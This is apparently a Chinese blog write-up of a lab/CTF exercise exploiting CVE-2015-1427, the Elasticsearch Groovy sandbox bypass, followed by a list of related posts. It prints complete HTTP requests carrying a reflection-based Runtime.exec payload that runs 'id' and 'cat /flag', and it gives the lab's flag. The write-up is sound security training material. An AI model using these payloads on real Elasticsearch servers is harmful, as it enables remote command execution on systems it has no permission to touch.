春秋云镜 CVE-2015-1427

最新推荐文章于 2023-12-25 16:49:54 发布
最新推荐文章于 2023-12-25 16:49:54 发布
阅读量193 收藏 2
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/132857525
版权

春秋云镜 CVE-2015-1427 ElasticSearch RCE

靶标介绍

ElasticSearch RCE

启动场景

在这里插入图片描述

漏洞利用

因查询时至少要求es中有一条数据,所以发送如下数据包,增加一个数据:

POST /website/blog/ HTTP/1.1
Host: eci-2zedttamjkr80i9iubel.cloudeci1.ichunqiu.com:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 23

{
	  "name": "test"
}

在这里插入图片描述
利用反射机制执行id:

POST /_search?pretty HTTP/1.1
Host: eci-2zedttamjkr80i9iubel.cloudeci1.ichunqiu.com:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 513

{

    "size":1,

    "script_fields": {

        "test#": {  

            "script":

                "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()",

 

            "lang": "groovy"

        }

    }
}

在这里插入图片描述
利用反射机制获取flag:

POST /_search?pretty HTTP/1.1
Host: eci-2zedttamjkr80i9iubel.cloudeci1.ichunqiu.com:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 515

{

    "size":1,

    "script_fields": {

        "test#": {  

            "script":

                "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /flag\").getInputStream())).readLines()",

 

            "lang": "groovy"

        }

    }

}

在这里插入图片描述
base64解码
在这里插入图片描述
得到flag

flag{ad8fbede-0291-4a7b-a284-bf60d6ac6aa1}

isbug0
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
CVE-2015-1427
weixin_34390105的博客
01-13 533
2019独角兽企业重金招聘Python工程师标准>>> ...
CVE-2015-1427(Groovy 沙盒绕过 && 代码执行漏洞)
浅笑996的博客
11-22 1934
1、vulhub环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 2、启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-1427/ sudo docker-compose up 3、访问目标的9200,会出现Elasticsearch的信息: 新版本中Elastic...
ElasticSearch代码执行攻击 CVE-2015-1427 已亲自复现
qq_42430287的博客
12-25 813
Elasticsearch的Groovy脚本引擎在1.3.8之前和1.4.3之前,允许远程攻击者绕过沙箱保护机制,通过精心编制的脚本执行任意shell命令。Elasticsearch <= 1.3.7 Elasticsearch 1.4.0 Elasticsearch 1.4.1 Elasticsearch 1.4.2受害者IP:192.168.63.129:64008 攻击者IP:192.168.63.1vulfocus下载链接 启动vulfocus 环境启动后,访问http://192.168.63.1
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1110
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
FREAK-Attack-CVE-2015-0204-Testing-Script:根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本
06-20
根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本。 它是一个免费软件,不需要别人的服务器来运行。 您的服务器在正常情况下必须通过 SSL Labs 测试获得 A+ 的...
CVE-2015-5119_walkthrough:文章CVE-2015-5119 Flash ByteArray UaF的存档
05-10
**CVE-2015-5119 Walkthrough: ActionScript中的Flash ByteArray Use-After-Free漏洞** 在本文中,我们将深入探讨一个重要的安全漏洞,即CVE-2015-5119,这是一个影响Adobe Flash Player的Use-After-Free(UAF)...
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
01-30
**CVE-2015-1701:APT攻击中的Win32k Local Privilege Escalation漏洞详解** 在2015年,安全研究人员发现了一个严重的问题,即CVE-2015-1701,这是一个针对Windows系统的本地权限提升(Local Privilege Escalation,...
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)
limb0的博客
11-22 532
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427) 一、漏洞介绍 由于 Groovy 脚本引擎中的不明缺陷,远程 Web 服务器上托管的 Elasticsearch 应用程序受到远程代码执行漏洞的影响。未经认证的远程攻击者使用特别构建的请求可从沙盒逃逸并执行任意 Java 代码。攻击成功可允许用户获取远程 shell 或操纵远程系统上的文件。 二、漏洞危害 ...
CVE-2015-1427 ElasticSearch(Groovy 沙盒绕过 && 代码执行漏洞)
weixin_51387754的博客
11-17 2553
漏洞简介 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 漏洞原因很简单,由于沙盒代码黑名单中的Java危险方法不全,从而导致恶意用户仍可以使用反射的方法来执行Java代码。这就完了?当然不是!由于Elasticsearch开发团队没有完全认知Groovy的强大,以为仅仅防止用户调用Java反射就可以免于被攻击,这真是太好笑了,我们来看下Groovy对
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 CVE-2015-1427 漏洞复现
ADummy的博客
02-24 835
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 ​ jre版本:openjdk:8-jre ​ elasticsearc
【学习笔记】ElasticSearch Groovy 脚本远程代码执行漏洞(CVE-2015-1427)
chualam的博客
11-01 382
ES旧版本中使用MVEL作为脚本执行引擎 没有安全限制 因此可以构造任意java代码 CVE -2014 -3120 出了这个CVE后 又用groovy引擎了 防止恶意脚本执行 还用了沙盒的机制(因为沙盒限制不严格导致漏洞) CVE-2015-1427 沙盒通过黑白名单检测可以说它是浅沙盒 如果黑名单禁用a() 白名单有b() 就用b()调用a() 通过一个类获取另一个类 通过getclass方法获取class对象反射调用类 替代品forname 利用它来调用java.lang.runtim
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427
黑白的博客
12-13 659
声明 好好学习,天天向上 漏洞描述 和3210的漏洞很像,也是恶意代码执行漏洞,3210是执行任意MVEL表达式和java代码,3210之后MVEL表达式被弃用,ES的动态脚本语言换成了Groovy(而且增加了sandbox),然额换成Groovy之后仍然存在恶意代码执行漏洞 影响范围 Elasticsearch 1.3.0-1.3.7 和 1.4.0-1.4.2 复现过程 这里使用v1.4.2版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-
buuctf [ElasticSearch]CVE-2015-1427
qq_1873822的博客
03-24 558
漏洞描述 ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个 远程代码执行漏洞(CVE-2014-3120) ,漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 Groovy语言“沙盒” ElasticSearch支持使用“在沙盒中的”Groovy语言
[春秋云镜]CVE-2015-1427
niubi707的博客
11-30 5505
春秋云镜CVE-2015-1427 ElasticSearch RCE
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427
weixin_34292924的博客
03-08 320
lupin · 2015/03/04 15:17作者:京东安全团队 Lupin0x00 前言ElasticSearch是一个JAVA开发的搜索分析引擎。2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码,后来脚本语言引擎换成了Groovy...
Elasticsearch 常见漏洞复现合集
寒星的博客
05-27 9074
Elasticsearch未授权访问 一、漏洞简介 ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。 二、影响版本 ALL 三、复现过程 复现环境 vulhub 复现步骤 安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。 http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。 http://xxxxxxxx:9.
ElasticSearch Groovy远程代码执行漏洞(CVE-2015-1427)POC
asdfghjkl978564的博客
04-17 444
ElasticSearch是一个JAVA开发的搜索分析引擎. 2014年爆出的(CVE-2014-3120),由于搜索引擎支持使用脚本代码(MVEL)作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意Java代码,后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 这次轮到的Groovy,影响版本是...
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值